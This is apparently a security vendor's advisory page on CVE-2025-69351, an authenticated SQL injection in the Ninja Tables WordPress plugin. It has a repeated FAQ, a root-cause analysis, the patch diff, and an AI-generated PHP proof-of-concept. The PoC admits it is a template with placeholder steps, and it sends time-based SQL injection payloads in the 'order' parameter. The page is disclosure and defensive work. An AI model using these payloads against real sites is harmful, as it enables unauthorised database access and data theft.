What is CVE-2025-69351?

CVE-2025-69351 is a medium-severity SQL injection vulnerability found in the Ninja Tables plugin for WordPress, affecting versions up to and including 5.2.4. It allows authenticated users with contributor-level access and above to execute arbitrary SQL commands, potentially leading to sensitive data exposure.

How does the SQL injection work?

The vulnerability arises from insufficient input validation and lack of prepared statements for user-supplied parameters in SQL queries. Attackers can manipulate the `order` parameter in the `getAllPosts` method, allowing them to append additional SQL queries and extract sensitive information from the database.

Who is affected by this vulnerability?

Any WordPress site using the Ninja Tables plugin version 5.2.4 or earlier is vulnerable. Specifically, authenticated users with contributor-level access or higher can exploit this vulnerability, making it a concern for multi-author sites where such permissions are often granted.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the Ninja Tables plugin installed on your WordPress site. If it is version 5.2.4 or earlier, your site is at risk of CVE-2025-69351.

What should I do to fix this vulnerability?

To mitigate this vulnerability, update the Ninja Tables plugin to version 5.2.5 or later, where the issue has been patched. Regularly updating plugins is essential for maintaining site security.

What does the CVSS score of 6.5 mean?

A CVSS score of 6.5 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk, particularly in environments where users with contributor access can be untrusted.

How does the proof of concept demonstrate the vulnerability?

The proof of concept illustrates how an authenticated contributor can exploit the vulnerability by sending a crafted AJAX request that manipulates the `order` parameter. This demonstrates the potential for executing arbitrary SQL commands and extracting data from the database.

What kind of data could be exposed?

Exploitation of this vulnerability could allow attackers to access sensitive data stored in the WordPress database, including user credentials, personal information, and other plugin-specific data, which could compromise the entire site.

How can I protect my site from future vulnerabilities?

To protect your site from future vulnerabilities, implement a routine of regular updates for all plugins and themes, use security plugins that monitor for vulnerabilities, and employ best practices for user permissions to limit access.

What is the significance of authenticated SQL injection?

Authenticated SQL injection means that the attacker must have valid login credentials to exploit the vulnerability, which can limit immediate impact but still poses a serious threat, especially on sites with multiple users.

What are prepared statements and why are they important?

Prepared statements are a way of structuring SQL queries to separate data from code, which helps prevent SQL injection attacks. Their use is critical in ensuring that user input cannot manipulate SQL commands.

What are the implications of this vulnerability for site administrators?

Site administrators must be vigilant in monitoring plugin updates and user permissions. They should also educate users about the risks associated with elevated permissions and ensure that only trusted users have contributor-level access.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-69351: Ninja Tables <= 5.2.4 – Authenticated (Contributor+) SQL Injection (ninja-tables)

CVE ID CVE-2025-69351

Plugin ninja-tables

Severity Medium (CVSS 6.5)

CWE 89

Vulnerable Version 5.2.4

Patched Version 5.2.5

Disclosed January 6, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-69351:
This vulnerability is an authenticated SQL injection in the Ninja Tables WordPress plugin, affecting versions up to and including 5.2.4. The flaw allows attackers with contributor-level or higher permissions to execute arbitrary SQL commands, potentially leading to sensitive database information disclosure.

Atomic Edge research identified the root cause as insufficient input validation and a lack of prepared statements for user-supplied parameters controlling SQL `ORDER BY` sort direction. The vulnerable code resides in the `getAllPosts` method within `/ninja-tables/app/Models/Post.php`. The method directly used the `$args[‘order’]` parameter in an `orderBy()` Eloquent query builder call at line 28. The `DefaultProvider.php` and `FluentCartTrait.php` files contained similar patterns where the `sorting_column_by` and `order_by_type` parameters were not validated before concatenation into raw SQL expressions.

An attacker can exploit this vulnerability by sending a crafted request to a backend endpoint that calls the `getAllPosts` method or related data provider functions. The attack vector likely involves a WordPress AJAX action or a REST API endpoint where the attacker, authenticated as a contributor, can control the `order` or `sorting_column_by` parameters. A payload like `DESC; SELECT SLEEP(5)–` could be injected to demonstrate time-based blind SQL injection, enabling data extraction from the database.

The patch addresses the vulnerability by implementing strict validation on the sort direction parameters. In `Post.php`, the code now retrieves the order type using `Arr::get($args, ‘order’)`, converts it to uppercase, and checks it against an allowed list (`[‘ASC’, ‘DESC’]`) before use. The same validation logic is applied in `DefaultProvider.php` for the `sorting_column_by` parameter and in `FluentCartTrait.php` for `order_by_type`. The `GutenbergModule.php` file also adds sanitization for the `sorting_column` parameter using `sanitize_key()` and validates `sorting_column_by`. These changes ensure user input cannot break out of the intended SQL clause.

Successful exploitation grants an authenticated attacker the ability to append arbitrary SQL queries to existing ones executed by the plugin. This can lead to full extraction of sensitive data from the WordPress database, including hashed user credentials, personal information, and other plugin-specific data. The attack requires contributor-level access, limiting immediate impact, but such access is commonly granted to untrusted users on multi-author sites.

Differential between vulnerable and patched code

Code Diff

--- a/ninja-tables/app/Models/Post.php
+++ b/ninja-tables/app/Models/Post.php
@@ -25,7 +25,10 @@
                          }
                      });
         $total = $posts->count();
-        $posts = $posts->orderBy($orderBy, $args['order'])
+        $orderByType = Arr::get($args, 'order');
+        $orderByType = in_array(strtoupper($orderByType), ['ASC', 'DESC']) ? $orderByType : 'DESC';
+
+        $posts = $posts->orderBy($orderBy, $orderByType)
                        ->skip($args['offset'])
                        ->take($args['posts_per_page'])
                        ->get();
@@ -129,7 +132,7 @@
                 update_post_meta($tableId, '_ninja_table_columns', $tableColumns);
                 if ($provider === 'default') {
                     NinjaTableItem::where('table_id', $tableId)->delete();
-                }
+                }
         } elseif (is_array($rawColumns) && ! empty($rawColumns)) {
             foreach ($rawColumns as $column) {
                 foreach ($column as $column_index => $column_value) {
--- a/ninja-tables/app/Modules/DataProviders/DefaultProvider.php
+++ b/ninja-tables/app/Modules/DataProviders/DefaultProvider.php
@@ -104,14 +104,15 @@
         $columns         = ninja_table_get_table_columns($tableId);
         $sortingColumn   = Arr::get($settings, 'sorting_column');
         $sortingColumnBy = Arr::get($settings, 'sorting_column_by', 'asc');
+        $sortingColumnBy = in_array(strtoupper($sortingColumnBy), ['ASC', 'DESC']) ? $sortingColumnBy : 'DESC';

         $column = Arr::first($columns, function ($column) use ($sortingColumn) {
             return Arr::get($column, 'key') === $sortingColumn;
         });

-        $dataType = Arr::get($column, 'data_type');
-
-        $dateFormat = Arr::get($column, 'dateFormat');
+        $dataType      = Arr::get($column, 'data_type');
+        $dateFormat    = Arr::get($column, 'dateFormat');
+        $sortingColumn = Arr::get($column, 'key');

         if ($dataType === 'number') {
             $query->orderByRaw("CAST(JSON_UNQUOTE(JSON_EXTRACT(value, '$.$sortingColumn')) AS SIGNED) " . $sortingColumnBy);
--- a/ninja-tables/app/Modules/FluentCart/Traits/FluentCartTrait.php
+++ b/ninja-tables/app/Modules/FluentCart/Traits/FluentCartTrait.php
@@ -49,6 +49,7 @@

         $orderBy         = Arr::get($queryConditions, 'order_by');
         $orderByType     = Arr::get($queryConditions, 'order_by_type');
+        $orderByType     = in_array(strtoupper($orderByType), ["ASC", "DESC"]) ? $orderByType : 'DESC';
         $categories      = Arr::get($querySelection, 'product-categories');
         //TODO: rename product-types to product-brands
         $brands          = Arr::get($querySelection, 'product-types');
--- a/ninja-tables/app/Modules/Gutenberg/GutenbergModule.php
+++ b/ninja-tables/app/Modules/Gutenberg/GutenbergModule.php
@@ -37,7 +37,7 @@
                 'preview_required_scripts' => array(
                     $assets . "css/ninjatables-public.css",
                     $assets . "css/ninja-table-builder-public.css",
-                    includes_url( '/js/dist/vendor/moment.min.js' ),
+                    includes_url('/js/dist/vendor/moment.min.js'),
                     $assets . "libs/footable/js/footable.min.js",
                     $assets . "js/ninja-tables-footable.js",
 //                    $assets . "js/ninja-table-builder-public.js",
@@ -128,6 +128,19 @@
             $tablePreference = ninja_tables_sanitize_array($tableSettings);
         }

-        Post::updatedSettings($tableId, $rawColumns, $tablePreference);
+        if (!empty($tablePreference['sorting_column_by'])) {
+            $direction = strtoupper($tablePreference['sorting_column_by']);
+            if (!in_array($direction, ['ASC', 'DESC'], true)) {
+                $tablePreference['sorting_column_by'] = 'DESC';
+            }
+        }
+
+        if (!empty($tablePreference['sorting_column'])) {
+            $tablePreference['sorting_column'] = sanitize_key($tablePreference['sorting_column']);
+        }
+
+        $mergedSettings = wp_parse_args($tablePreference, ninjaTablesGetDefaultSettings());
+
+        Post::updatedSettings($tableId, $rawColumns, $mergedSettings);
     }
 }
--- a/ninja-tables/assets/blocks/index.php
+++ b/ninja-tables/assets/blocks/index.php
@@ -1,3 +0,0 @@
-<?php
-
-// Silence is golden
 No newline at end of file
--- a/ninja-tables/assets/blocks/table-block/index.php
+++ b/ninja-tables/assets/blocks/table-block/index.php
@@ -1,3 +0,0 @@
-<?php
-
-// Silence is golden
 No newline at end of file
--- a/ninja-tables/assets/css/index.php
+++ b/ninja-tables/assets/css/index.php
@@ -1,3 +0,0 @@
-<?php
-
-// Silence is golden
 No newline at end of file
--- a/ninja-tables/assets/icons/index.php
+++ b/ninja-tables/assets/icons/index.php
@@ -1,3 +0,0 @@
-<?php
-
-// Silence is golden
 No newline at end of file
--- a/ninja-tables/assets/images/index.php
+++ b/ninja-tables/assets/images/index.php
@@ -1,3 +0,0 @@
-<?php
-
-// Silence is golden
 No newline at end of file
--- a/ninja-tables/assets/img/index.php
+++ b/ninja-tables/assets/img/index.php
@@ -1,3 +0,0 @@
-<?php
-
-// Silence is golden
 No newline at end of file
--- a/ninja-tables/assets/js/fluent-cart/index.php
+++ b/ninja-tables/assets/js/fluent-cart/index.php
@@ -1,3 +0,0 @@
-<?php
-
-// Silence is golden
 No newline at end of file
--- a/ninja-tables/assets/js/index.php
+++ b/ninja-tables/assets/js/index.php
@@ -1,3 +0,0 @@
-<?php
-
-// Silence is golden
 No newline at end of file
--- a/ninja-tables/assets/libs/ace/index.php
+++ b/ninja-tables/assets/libs/ace/index.php
@@ -1,3 +0,0 @@
-<?php
-
-// Silence is golden
 No newline at end of file
--- a/ninja-tables/assets/libs/footable/css/index.php
+++ b/ninja-tables/assets/libs/footable/css/index.php
@@ -1,3 +0,0 @@
-<?php
-
-// Silence is golden
 No newline at end of file
--- a/ninja-tables/assets/libs/footable/index.php
+++ b/ninja-tables/assets/libs/footable/index.php
@@ -1,3 +0,0 @@
-<?php
-
-// Silence is golden
 No newline at end of file
--- a/ninja-tables/assets/libs/footable/js/index.php
+++ b/ninja-tables/assets/libs/footable/js/index.php
@@ -1,3 +0,0 @@
-<?php
-
-// Silence is golden
 No newline at end of file
--- a/ninja-tables/assets/libs/icons/index.php
+++ b/ninja-tables/assets/libs/icons/index.php
@@ -1,3 +0,0 @@
-<?php
-
-// Silence is golden
 No newline at end of file
--- a/ninja-tables/assets/libs/index.php
+++ b/ninja-tables/assets/libs/index.php
@@ -1,3 +0,0 @@
-<?php
-
-// Silence is golden
 No newline at end of file
--- a/ninja-tables/ninja-tables.php
+++ b/ninja-tables/ninja-tables.php
@@ -5,7 +5,7 @@
 /**
 Plugin Name: Ninja Tables – Easy Data Table Builder
 Description: The Easiest & Fastest Responsive Table Plugin on WordPress. Multiple templates, drag-&-drop live table builder, multiple color scheme, and styles.
-Version: 5.2.4
+Version: 5.2.5
 Author: WPManageNinja LLC
 Author URI: https://ninjatables.com/
 Plugin URI: https://wpmanageninja.com/downloads/ninja-tables-pro-add-on/
@@ -18,7 +18,7 @@

 define('NINJA_TABLES_DIR_URL', plugin_dir_url(__FILE__));
 define('NINJA_TABLES_DIR_PATH', plugin_dir_path(__FILE__));
-define('NINJA_TABLES_VERSION', '5.2.4');
+define('NINJA_TABLES_VERSION', '5.2.5');
 define('NINJA_TABLES_BASENAME', plugin_basename(__FILE__));

 call_user_func(function ($bootstrap) {

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-69351 - Ninja Tables <= 5.2.4 - Authenticated (Contributor+) SQL Injection
<?php

$target_url = 'http://example.com/wp-admin/admin-ajax.php';
$username = 'contributor';
$password = 'password';

// Step 1: Authenticate and obtain WordPress nonce for AJAX requests.
// This PoC assumes the vulnerable endpoint is an AJAX action.
// The exact action name must be identified from plugin code review.
// For demonstration, we use a placeholder 'ninja_table_get_data'.
$action = 'ninja_table_get_data';

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// Login to WordPress (simplified - real PoC would need to handle nonce from login form).
// This step is complex and site-dependent. A full PoC would require parsing the login page.
// For brevity, this script outlines the attack vector structure.

echo "[!] This PoC is a template. Actual exploitation requires:";
echo "n1. Valid contributor credentials.";
echo "n2. The correct AJAX action hook name (e.g., wp_ajax_ninja_table_get_data).";
echo "n3. A valid nonce for that action (often included in table settings).n";

// Step 2: Craft malicious request with SQL injection in order/sorting parameter.
$post_data = array(
    'action' => $action,
    'table_id' => '1', // A valid table ID.
    'order' => 'DESC; SELECT IF(1=1,SLEEP(5),0)--', // Time-based SQLi payload.
    // Alternatively, for other endpoints: 'sorting_column_by' => 'ASC; SELECT SLEEP(5)--'
);

curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);

$start = microtime(true);
$response = curl_exec($ch);
$end = microtime(true);

$time = $end - $start;
echo "nRequest took " . round($time, 2) . " seconds.n";
if ($time > 4.5) {
    echo "[+] Potential SQL injection successful (time delay detected).n";
} else {
    echo "[-] No time delay detected.n";
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2025-69351?
Overview of the vulnerability
CVE-2025-69351 is a medium-severity SQL injection vulnerability found in the Ninja Tables plugin for WordPress, affecting versions up to and including 5.2.4. It allows authenticated users with contributor-level access and above to execute arbitrary SQL commands, potentially leading to sensitive data exposure.
How does the SQL injection work?
Mechanism of exploitation
The vulnerability arises from insufficient input validation and lack of prepared statements for user-supplied parameters in SQL queries. Attackers can manipulate the `order` parameter in the `getAllPosts` method, allowing them to append additional SQL queries and extract sensitive information from the database.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the Ninja Tables plugin version 5.2.4 or earlier is vulnerable. Specifically, authenticated users with contributor-level access or higher can exploit this vulnerability, making it a concern for multi-author sites where such permissions are often granted.
How can I check if my site is vulnerable?
Steps to assess vulnerability
To determine if your site is vulnerable, check the version of the Ninja Tables plugin installed on your WordPress site. If it is version 5.2.4 or earlier, your site is at risk of CVE-2025-69351.
What should I do to fix this vulnerability?
Mitigation steps
To mitigate this vulnerability, update the Ninja Tables plugin to version 5.2.5 or later, where the issue has been patched. Regularly updating plugins is essential for maintaining site security.
What does the CVSS score of 6.5 mean?
Understanding severity ratings
A CVSS score of 6.5 indicates a medium severity level, suggesting that while the vulnerability is not critical, it poses a significant risk, particularly in environments where users with contributor access can be untrusted.
How does the proof of concept demonstrate the vulnerability?
Explaining the PoC
The proof of concept illustrates how an authenticated contributor can exploit the vulnerability by sending a crafted AJAX request that manipulates the `order` parameter. This demonstrates the potential for executing arbitrary SQL commands and extracting data from the database.
What kind of data could be exposed?
Potential data leakage
Exploitation of this vulnerability could allow attackers to access sensitive data stored in the WordPress database, including user credentials, personal information, and other plugin-specific data, which could compromise the entire site.
How can I protect my site from future vulnerabilities?
Best practices for security
To protect your site from future vulnerabilities, implement a routine of regular updates for all plugins and themes, use security plugins that monitor for vulnerabilities, and employ best practices for user permissions to limit access.
What is the significance of authenticated SQL injection?
Understanding the attack vector
Authenticated SQL injection means that the attacker must have valid login credentials to exploit the vulnerability, which can limit immediate impact but still poses a serious threat, especially on sites with multiple users.
What are prepared statements and why are they important?
Role of prepared statements in security
Prepared statements are a way of structuring SQL queries to separate data from code, which helps prevent SQL injection attacks. Their use is critical in ensuring that user input cannot manipulate SQL commands.
What are the implications of this vulnerability for site administrators?
Administrative responsibilities
Site administrators must be vigilant in monitoring plugin updates and user permissions. They should also educate users about the risks associated with elevated permissions and ensure that only trusted users have contributor-level access.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations